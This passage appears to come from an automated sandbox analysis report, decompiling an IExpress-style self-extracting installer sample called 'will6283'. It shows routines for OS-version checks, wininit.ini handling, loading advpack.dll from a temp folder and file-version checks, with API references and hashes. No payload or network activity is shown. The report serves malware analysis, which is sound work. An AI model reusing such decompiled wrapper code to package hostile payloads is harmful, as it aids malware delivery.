                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                • String ID: <None>$LICENSE
                                                • API String ID: 2414642746-383193767
                                                • Opcode ID: 32b268b848cfeb8e52c2825a2649f8391143a3bf955275622db7d93a1599ab98
                                                • Instruction ID: 31b5dd6113b2830a0294c006e5138db3ba366e2f2703b7b0544b00fe06095c83
                                                • Opcode Fuzzy Hash: 32b268b848cfeb8e52c2825a2649f8391143a3bf955275622db7d93a1599ab98
                                                • Instruction Fuzzy Hash: 06117270700201EBD774BB26AC09E5B7AEDEBE5740B10842EF6C5EE565DA7F880097A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E010624E0(void* __ebx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t7;
                                                				void* _t20;
                                                				long _t26;
                                                				signed int _t27;
                                                
                                                				_t20 = __ebx;
                                                				_t7 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t7 ^ _t27;
                                                				_t25 = 0x104;
                                                				_t26 = 0;
                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                					E0106658A( &_v268, 0x104, "wininit.ini");
                                                					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                					_t25 = _lopen( &_v268, 0x40);
                                                					if(_t25 != 0xffffffff) {
                                                						_t26 = _llseek(_t25, 0, 2);
                                                						_lclose(_t25);
                                                					}
                                                				}
                                                				return E01066CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                			}











                                                0x010624e0
                                                0x010624eb
                                                0x010624f2
                                                0x010624f7
                                                0x01062504
                                                0x0106250e
                                                0x0106251d
                                                0x0106252c
                                                0x01062541
                                                0x01062546
                                                0x01062553
                                                0x01062555
                                                0x01062555
                                                0x01062546
                                                0x0106256c

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 01062506
                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0106252C
                                                • _lopen.KERNEL32(?,00000040), ref: 0106253B
                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0106254C
                                                • _lclose.KERNEL32(00000000), ref: 01062555
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                • String ID: wininit.ini
                                                • API String ID: 3273605193-4206010578
                                                • Opcode ID: e833989ecf48d52e4b3a3aa1a53b05acd433356d11c4fd12316c94d2e2bfc787
                                                • Instruction ID: c6e75c86597399a737a90b3c78b551b61b4694bcd43e8bf4c20236dab4852ed2
                                                • Opcode Fuzzy Hash: e833989ecf48d52e4b3a3aa1a53b05acd433356d11c4fd12316c94d2e2bfc787
                                                • Instruction Fuzzy Hash: 26017532700118A7E730AA699C0CEDF7BBCDB95761F000195FA89E3194DE799A45CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E010636EE(CHAR* __ecx) {
                                                				signed int _v8;
                                                				char _v268;
                                                				struct _OSVERSIONINFOA _v416;
                                                				signed int _v420;
                                                				signed int _v424;
                                                				CHAR* _v428;
                                                				CHAR* _v432;
                                                				signed int _v436;
                                                				CHAR* _v440;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t72;
                                                				CHAR* _t77;
                                                				CHAR* _t91;
                                                				CHAR* _t94;
                                                				int _t97;
                                                				CHAR* _t98;
                                                				signed char _t99;
                                                				CHAR* _t104;
                                                				signed short _t107;
                                                				signed int _t109;
                                                				short _t113;
                                                				void* _t114;
                                                				signed char _t115;
                                                				short _t119;
                                                				CHAR* _t123;
                                                				CHAR* _t124;
                                                				CHAR* _t129;
                                                				signed int _t131;
                                                				signed int _t132;
                                                				CHAR* _t135;
                                                				CHAR* _t138;
                                                				signed int _t139;
                                                
                                                				_t72 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t72 ^ _t139;
                                                				_v416.dwOSVersionInfoSize = 0x94;
                                                				_t115 = __ecx;
                                                				_t135 = 0;
                                                				_v432 = __ecx;
                                                				_t138 = 0;
                                                				if(GetVersionExA( &_v416) != 0) {
                                                					_t133 = _v416.dwMajorVersion;
                                                					_t119 = 2;
                                                					_t77 = _v416.dwPlatformId - 1;
                                                					__eflags = _t77;
                                                					if(_t77 == 0) {
                                                						_t119 = 0;
                                                						__eflags = 1;
                                                						 *0x1068184 = 1;
                                                						 *0x1068180 = 1;
                                                						L13:
                                                						 *0x1069a40 = _t119;
                                                						L14:
                                                						__eflags =  *0x1068a34 - _t138; // 0x0
                                                						if(__eflags != 0) {
                                                							goto L66;
                                                						}
                                                						__eflags = _t115;
                                                						if(_t115 == 0) {
                                                							goto L66;
                                                						}
                                                						_v428 = _t135;
                                                						__eflags = _t119;
                                                						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                						_t11 =  &_v420;
                                                						 *_t11 = _v420 & _t138;
                                                						__eflags =  *_t11;
                                                						_v440 = _t115;
                                                						do {
                                                							_v424 = _t135 * 0x18;
                                                							_v436 = E01062A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                							_t91 = E01062A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                							_t123 = _v436;
                                                							_t133 = 0x54d;
                                                							__eflags = _t123;
                                                							if(_t123 < 0) {
                                                								L32:
                                                								__eflags = _v420 - 1;
                                                								if(_v420 == 1) {
                                                									_t138 = 0x54c;
                                                									L36:
                                                									__eflags = _t138;
                                                									if(_t138 != 0) {
                                                										L40:
                                                										__eflags = _t138 - _t133;
                                                										if(_t138 == _t133) {
                                                											L30:
                                                											_v420 = _v420 & 0x00000000;
                                                											_t115 = 0;
                                                											_v436 = _v436 & 0x00000000;
                                                											__eflags = _t138 - _t133;
                                                											_t133 = _v432;
                                                											if(__eflags != 0) {
                                                												_t124 = _v440;
                                                											} else {
                                                												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                												_v420 =  &_v268;
                                                											}
                                                											__eflags = _t124;
                                                											if(_t124 == 0) {
                                                												_t135 = _v436;
                                                											} else {
                                                												_t99 = _t124[0x30];
                                                												_t135 = _t124[0x34] + 0x84 + _t133;
                                                												__eflags = _t99 & 0x00000001;
                                                												if((_t99 & 0x00000001) == 0) {
                                                													asm("sbb ebx, ebx");
                                                													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                												} else {
                                                													_t115 = 0x104;
                                                												}
                                                											}
                                                											__eflags =  *0x1068a38 & 0x00000001;
                                                											if(( *0x1068a38 & 0x00000001) != 0) {
                                                												L64:
                                                												_push(0);
                                                												_push(0x30);
                                                												_push(_v420);
                                                												_push("lega");
                                                												goto L65;
                                                											} else {
                                                												__eflags = _t135;
                                                												if(_t135 == 0) {
                                                													goto L64;
                                                												}
                                                												__eflags =  *_t135;
                                                												if( *_t135 == 0) {
                                                													goto L64;
                                                												}
                                                												MessageBeep(0);
                                                												_t94 = E0106681F(_t115);
                                                												__eflags = _t94;
                                                												if(_t94 == 0) {
                                                													L57:
                                                													0x180030 = 0x30;
                                                													L58:
                                                													_t97 = MessageBoxA(0, _t135, "lega", 0x00180030 | _t115);
                                                													__eflags = _t115 & 0x00000004;
                                                													if((_t115 & 0x00000004) == 0) {
                                                														__eflags = _t115 & 0x00000001;
                                                														if((_t115 & 0x00000001) == 0) {
                                                															goto L66;
                                                														}
                                                														__eflags = _t97 - 1;
                                                														L62:
                                                														if(__eflags == 0) {
                                                															_t138 = 0;
                                                														}
                                                														goto L66;
                                                													}
                                                													__eflags = _t97 - 6;
                                                													goto L62;
                                                												}
                                                												_t98 = E010667C9(_t124, _t124);
                                                												__eflags = _t98;
                                                												if(_t98 == 0) {
                                                													goto L57;
                                                												}
                                                												goto L58;
                                                											}
                                                										}
                                                										__eflags = _t138 - 0x54c;
                                                										if(_t138 == 0x54c) {
                                                											goto L30;
                                                										}
                                                										__eflags = _t138;
                                                										if(_t138 == 0) {
                                                											goto L66;
                                                										}
                                                										_t135 = 0;
                                                										__eflags = 0;
                                                										goto L44;
                                                									}
                                                									L37:
                                                									_t129 = _v432;
                                                									__eflags = _t129[0x7c];
                                                									if(_t129[0x7c] == 0) {
                                                										goto L66;
                                                									}
                                                									_t133 =  &_v268;
                                                									_t104 = E010628E8(_t129,  &_v268, _t129,  &_v428);
                                                									__eflags = _t104;
                                                									if(_t104 != 0) {
                                                										goto L66;
                                                									}
                                                									_t135 = _v428;
                                                									_t133 = 0x54d;
                                                									_t138 = 0x54d;
                                                									goto L40;
                                                								}
                                                								goto L33;
                                                							}
                                                							__eflags = _t91;
                                                							if(_t91 > 0) {
                                                								goto L32;
                                                							}
                                                							__eflags = _t123;
                                                							if(_t123 != 0) {
                                                								__eflags = _t91;
                                                								if(_t91 != 0) {
                                                									goto L37;
                                                								}
                                                								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                								L27:
                                                								if(__eflags <= 0) {
                                                									goto L37;
                                                								}
                                                								L28:
                                                								__eflags = _t135;
                                                								if(_t135 == 0) {
                                                									goto L33;
                                                								}
                                                								_t138 = 0x54c;
                                                								goto L30;
                                                							}
                                                							__eflags = _t91;
                                                							_t107 = _v416.dwBuildNumber;
                                                							if(_t91 != 0) {
                                                								_t131 = _v424;
                                                								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                									goto L37;
                                                								}
                                                								goto L28;
                                                							}
                                                							_t132 = _t107 & 0x0000ffff;
                                                							_t109 = _v424;
                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                								goto L28;
                                                							}
                                                							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                							goto L27;
                                                							L33:
                                                							_t135 =  &(_t135[1]);
                                                							_v428 = _t135;
                                                							_v420 = _t135;
                                                							__eflags = _t135 - 2;
                                                						} while (_t135 < 2);
                                                						goto L36;
                                                					}
                                                					__eflags = _t77 == 1;
                                                					if(_t77 == 1) {
                                                						 *0x1069a40 = _t119;
                                                						 *0x1068184 = 1;
                                                						 *0x1068180 = 1;
                                                						__eflags = _t133 - 3;
                                                						if(_t133 > 3) {
                                                							__eflags = _t133 - 5;
                                                							if(_t133 < 5) {
                                                								goto L14;
                                                							}
                                                							_t113 = 3;
                                                							_t119 = _t113;
                                                							goto L13;
                                                						}
                                                						_t119 = 1;
                                                						_t114 = 3;
                                                						 *0x1069a40 = 1;
                                                						__eflags = _t133 - _t114;
                                                						if(__eflags < 0) {
                                                							L9:
                                                							 *0x1068184 = _t135;
                                                							 *0x1068180 = _t135;
                                                							goto L14;
                                                						}
                                                						if(__eflags != 0) {
                                                							goto L14;
                                                						}
                                                						__eflags = _v416.dwMinorVersion - 0x33;
                                                						if(_v416.dwMinorVersion >= 0x33) {
                                                							goto L14;
                                                						}
                                                						goto L9;
                                                					}
                                                					_t138 = 0x4ca;
                                                					goto L44;
                                                				} else {
                                                					_t138 = 0x4b4;
                                                					L44:
                                                					_push(_t135);
                                                					_push(0x10);
                                                					_push(_t135);
                                                					_push(_t135);
                                                					L65:
                                                					_t133 = _t138;
                                                					E010644B9(0, _t138);
                                                					L66:
                                                					return E01066CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                				}
                                                			}





































                                                0x010636f9
                                                0x01063700
                                                0x0106370c
                                                0x01063716
                                                0x01063718
                                                0x0106371b
                                                0x01063721
                                                0x0106372b
                                                0x0106373d
                                                0x01063745
                                                0x01063746
                                                0x01063746
                                                0x01063749
                                                0x010637ab
                                                0x010637ad
                                                0x010637ae
                                                0x010637b3
                                                0x010637b8
                                                0x010637b8
                                                0x010637bf
                                                0x010637bf
                                                0x010637c5
                                                0x00000000
                                                0x00000000
                                                0x010637cb
                                                0x010637cd
                                                0x00000000
                                                0x00000000
                                                0x010637d5
                                                0x010637db
                                                0x010637e8
                                                0x010637ea
                                                0x010637ea
                                                0x010637ea
                                                0x010637f0
                                                0x010637f6
                                                0x01063805
                                                0x01063817
                                                0x0106382b
                                                0x01063830
                                                0x01063836
                                                0x0106383b
                                                0x0106383d
                                                0x010638eb
                                                0x010638eb
                                                0x010638f2
                                                0x0106390c
                                                0x01063911
                                                0x01063911
                                                0x01063913
                                                0x0106394d
                                                0x0106394d
                                                0x0106394f
                                                0x010638a9
                                                0x010638a9
                                                0x010638b0
                                                0x010638b2
                                                0x010638b9
                                                0x010638bb
                                                0x010638c1
                                                0x01063975
                                                0x010638c7
                                                0x010638de
                                                0x010638e0
                                                0x010638e0
                                                0x0106397b
                                                0x0106397d
                                                0x010639a9
                                                0x0106397f
                                                0x01063982
                                                0x0106398b
                                                0x0106398d
                                                0x0106398f
                                                0x0106399f
                                                0x010639a1
                                                0x01063991
                                                0x01063991
                                                0x01063991
                                                0x0106398f
                                                0x010639af
                                                0x010639b6
                                                0x01063a0f
                                                0x01063a0f
                                                0x01063a11
                                                0x01063a13
                                                0x01063a19
                                                0x00000000
                                                0x010639b8
                                                0x010639b8
                                                0x010639ba
                                                0x00000000
                                                0x00000000
                                                0x010639bc
                                                0x010639bf
                                                0x00000000
                                                0x00000000
                                                0x010639c3
                                                0x010639c9
                                                0x010639ce
                                                0x010639d0
                                                0x010639e3
                                                0x010639e5
                                                0x010639e6
                                                0x010639f1
                                                0x010639f7
                                                0x010639fa
                                                0x01063a01
                                                0x01063a04
                                                0x00000000
                                                0x00000000
                                                0x01063a06
                                                0x01063a09
                                                0x01063a09
                                                0x01063a0b
                                                0x01063a0b
                                                0x00000000
                                                0x01063a09
                                                0x010639fc
                                                0x00000000
                                                0x010639fc
                                                0x010639d3
                                                0x010639d8
                                                0x010639da
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x010639dc
                                                0x010639b6
                                                0x01063955
                                                0x0106395b
                                                0x00000000
                                                0x00000000
                                                0x01063961
                                                0x01063963
                                                0x00000000
                                                0x00000000
                                                0x01063969
                                                0x01063969
                                                0x00000000
                                                0x01063969
                                                0x01063915
                                                0x01063915
                                                0x0106391b
                                                0x0106391f
                                                0x00000000
                                                0x00000000
                                                0x0106392d
                                                0x01063933
                                                0x01063938
                                                0x0106393a
                                                0x00000000
                                                0x00000000
                                                0x01063940
                                                0x01063946
                                                0x0106394b
                                                0x00000000
                                                0x0106394b
                                                0x00000000
                                                0x010638f2
                                                0x01063843
                                                0x01063845
                                                0x00000000
                                                0x00000000
                                                0x0106384b
                                                0x0106384d
                                                0x01063883
                                                0x01063885
                                                0x00000000
                                                0x00000000
                                                0x0106389a
                                                0x0106389e
                                                0x0106389e
                                                0x00000000
                                                0x00000000
                                                0x010638a0
                                                0x010638a0
                                                0x010638a2
                                                0x00000000
                                                0x00000000
                                                0x010638a4
                                                0x00000000
                                                0x010638a4
                                                0x0106384f
                                                0x01063851
                                                0x01063857
                                                0x0106386e
                                                0x01063877
                                                0x0106387b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01063881
                                                0x01063859
                                                0x0106385c
                                                0x01063862
                                                0x01063866
                                                0x00000000
                                                0x00000000
                                                0x01063868
                                                0x00000000
                                                0x010638f4
                                                0x010638f4
                                                0x010638f5
                                                0x010638fb
                                                0x01063901
                                                0x01063901
                                                0x00000000
                                                0x0106390a
                                                0x0106374b
                                                0x0106374e
                                                0x0106375c
                                                0x01063764
                                                0x01063769
                                                0x0106376e
                                                0x01063771
                                                0x0106379c
                                                0x0106379f
                                                0x00000000
                                                0x00000000
                                                0x010637a3
                                                0x010637a4
                                                0x00000000
                                                0x010637a4
                                                0x01063773
                                                0x01063777
                                                0x01063778
                                                0x0106377f
                                                0x01063781
                                                0x0106378e
                                                0x0106378e
                                                0x01063794
                                                0x00000000
                                                0x01063794
                                                0x01063783
                                                0x00000000
                                                0x00000000
                                                0x01063785
                                                0x0106378c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0106378c
                                                0x01063750
                                                0x00000000
                                                0x0106372d
                                                0x0106372d
                                                0x0106396b
                                                0x0106396b
                                                0x0106396c
                                                0x0106396e
                                                0x0106396f
                                                0x01063a1e
                                                0x01063a1e
                                                0x01063a22
                                                0x01063a27
                                                0x01063a3e
                                                0x01063a3e

                                                APIs
                                                • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 01063723
                                                • MessageBeep.USER32(00000000), ref: 010639C3
                                                • MessageBoxA.USER32(00000000,00000000,lega,00000030), ref: 010639F1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Message$BeepVersion
                                                • String ID: 3$lega
                                                • API String ID: 2519184315-680046778
                                                • Opcode ID: 131a2c8db750c9aa029969bf903e02e59419d71d51f32967926a6b8c22df75d6
                                                • Instruction ID: b70b56515d3efbbe93c085da11a34282b7a953e436b42be6d6d47582fcc5a77b
                                                • Opcode Fuzzy Hash: 131a2c8db750c9aa029969bf903e02e59419d71d51f32967926a6b8c22df75d6
                                                • Instruction Fuzzy Hash: E791B171E012259FEBB58A29C9807EEB7F8BB85304F0540EAD9CD9F255D7358A80CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E01066495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void* __edi;
                                                				signed int _t9;
                                                				signed char _t14;
                                                				struct HINSTANCE__* _t15;
                                                				void* _t18;
                                                				CHAR* _t26;
                                                				void* _t27;
                                                				signed int _t28;
                                                
                                                				_t27 = __esi;
                                                				_t18 = __ebx;
                                                				_t9 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t9 ^ _t28;
                                                				_push(__ecx);
                                                				E01061781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                				_t26 = "advpack.dll";
                                                				E0106658A( &_v268, 0x104, _t26);
                                                				_t14 = GetFileAttributesA( &_v268);
                                                				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                					_t15 = LoadLibraryA(_t26);
                                                				} else {
                                                					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                				}
                                                				return E01066CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                			}













                                                0x01066495
                                                0x01066495
                                                0x010664a0
                                                0x010664a7
                                                0x010664ab
                                                0x010664bd
                                                0x010664c2
                                                0x010664d3
                                                0x010664df
                                                0x010664e8
                                                0x01066502
                                                0x010664ee
                                                0x010664f9
                                                0x010664f9
                                                0x01066516

                                                APIs
                                                • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010664DF
                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010664F9
                                                • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 01066502
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$AttributesFile
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                • API String ID: 438848745-1655358546
                                                • Opcode ID: b456f23e7129ede87923dc07553795cbefcbc13e7128328ef8525ca3f9130b84
                                                • Instruction ID: 73a4af8443c9fdb9404ae33fdcc37281fac6b94bf48c7a47afe344717e7f3e31
                                                • Opcode Fuzzy Hash: b456f23e7129ede87923dc07553795cbefcbc13e7128328ef8525ca3f9130b84
                                                • Instruction Fuzzy Hash: AF01D130A04108EBEB60EB64DC49AEE777CEBA0314F500199F5C5A71C4DF76AA868B51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E010628E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                				void* _v8;
                                                				char* _v12;
                                                				intOrPtr _v16;
                                                				void* _v20;
                                                				intOrPtr _v24;
                                                				int _v28;
                                                				int _v32;
                                                				void* _v36;
                                                				int _v40;
                                                				void* _v44;
                                                				intOrPtr _v48;
                                                				intOrPtr _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				long _t68;
                                                				void* _t70;
                                                				void* _t73;
                                                				void* _t79;
                                                				void* _t83;
                                                				void* _t87;
                                                				void* _t88;
                                                				intOrPtr _t93;
                                                				intOrPtr _t97;
                                                				intOrPtr _t99;
                                                				int _t101;
                                                				void* _t103;
                                                				void* _t106;
                                                				void* _t109;
                                                				void* _t110;
                                                
                                                				_v12 = __edx;
                                                				_t99 = __ecx;
                                                				_t106 = 0;
                                                				_v16 = __ecx;
                                                				_t87 = 0;
                                                				_t103 = 0;
                                                				_v20 = 0;
                                                				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                					L19:
                                                					_t106 = 1;
                                                				} else {
                                                					_t62 = 0;
                                                					_v8 = 0;
                                                					while(1) {
                                                						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                						if(E01062773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                							goto L20;
                                                						}
                                                						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                						_v28 = _t68;
                                                						if(_t68 == 0) {
                                                							_t99 = _v16;
                                                							_t70 = _v8 + _t99;
                                                							_t93 = _v24;
                                                							_t87 = _v20;
                                                							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                								goto L18;
                                                							}
                                                						} else {
                                                							_t103 = GlobalAlloc(0x42, _t68);
                                                							if(_t103 != 0) {
                                                								_t73 = GlobalLock(_t103);
                                                								_v36 = _t73;
                                                								if(_t73 != 0) {
                                                									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                										L15:
                                                										GlobalUnlock(_t103);
                                                										_t99 = _v16;
                                                										L18:
                                                										_t87 = _t87 + 1;
                                                										_t62 = _v8 + 0x3c;
                                                										_v20 = _t87;
                                                										_v8 = _v8 + 0x3c;
                                                										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                											continue;
                                                										} else {
                                                											goto L19;
                                                										}
                                                									} else {
                                                										_t79 = _v44;
                                                										_t88 = _t106;
                                                										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                										_t101 = _v28;
                                                										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                										_t97 = _v48;
                                                										_v36 = _t83;
                                                										_t109 = _t83;
                                                										do {
                                                											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E01062A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E01062A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                											_t109 = _t109 + 0x18;
                                                											_t88 = _t88 + 4;
                                                										} while (_t88 < 8);
                                                										_t87 = _v20;
                                                										_t106 = 0;
                                                										if(_v56 < 0 || _v64 > 0) {
                                                											if(_v52 < _t106 || _v60 > _t106) {
                                                												GlobalUnlock(_t103);
                                                											} else {
                                                												goto L15;
                                                											}
                                                										} else {
                                                											goto L15;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                				}
                                                				L20:
                                                				 *_a8 = _t87;
                                                				if(_t103 != 0) {
                                                					GlobalFree(_t103);
                                                				}
                                                				return _t106;
                                                			}

































                                                0x010628f1
                                                0x010628f4
                                                0x010628f7
                                                0x010628f9
                                                0x010628fc
                                                0x010628ff
                                                0x01062901
                                                0x01062907
                                                0x01062a62
                                                0x01062a64
                                                0x0106290d
                                                0x0106290d
                                                0x0106290f
                                                0x01062912
                                                0x01062920
                                                0x01062937
                                                0x00000000
                                                0x00000000
                                                0x01062944
                                                0x0106294a
                                                0x0106294f
                                                0x01062a2f
                                                0x01062a32
                                                0x01062a34
                                                0x01062a37
                                                0x01062a41
                                                0x00000000
                                                0x00000000
                                                0x01062955
                                                0x0106295e
                                                0x01062962
                                                0x01062969
                                                0x0106296f
                                                0x01062974
                                                0x0106298c
                                                0x01062a20
                                                0x01062a21
                                                0x01062a27
                                                0x01062a4c
                                                0x01062a4f
                                                0x01062a50
                                                0x01062a53
                                                0x01062a56
                                                0x01062a5c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x010629b2
                                                0x010629b2
                                                0x010629b5
                                                0x010629bd
                                                0x010629c3
                                                0x010629cc
                                                0x010629d5
                                                0x010629d7
                                                0x010629da
                                                0x010629dd
                                                0x010629df
                                                0x010629ec
                                                0x010629f8
                                                0x010629fc
                                                0x010629ff
                                                0x01062a02
                                                0x01062a07
                                                0x01062a0a
                                                0x01062a0f
                                                0x01062a19
                                                0x01062a81
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01062a0f
                                                0x0106298c
                                                0x01062974
                                                0x01062962
                                                0x00000000
                                                0x0106294f
                                                0x01062912
                                                0x01062a65
                                                0x01062a68
                                                0x01062a6c
                                                0x01062a6f
                                                0x01062a6f
                                                0x01062a7d

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 01062A6F
                                                  • Part of subcall function 01062773: CharUpperA.USER32(19E58FB5,00000000,00000000,00000000), ref: 010627A8
                                                  • Part of subcall function 01062773: CharNextA.USER32(0000054D), ref: 010627B5
                                                  • Part of subcall function 01062773: CharNextA.USER32(00000000), ref: 010627BC
                                                  • Part of subcall function 01062773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01062829
                                                  • Part of subcall function 01062773: RegQueryValueExA.ADVAPI32(?,01061140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01062852
                                                  • Part of subcall function 01062773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 01062870
                                                  • Part of subcall function 01062773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010628A0
